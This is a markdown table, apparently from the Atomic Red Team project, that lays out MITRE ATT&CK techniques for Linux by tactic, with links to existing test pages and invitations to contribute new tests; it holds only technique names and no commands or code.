| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
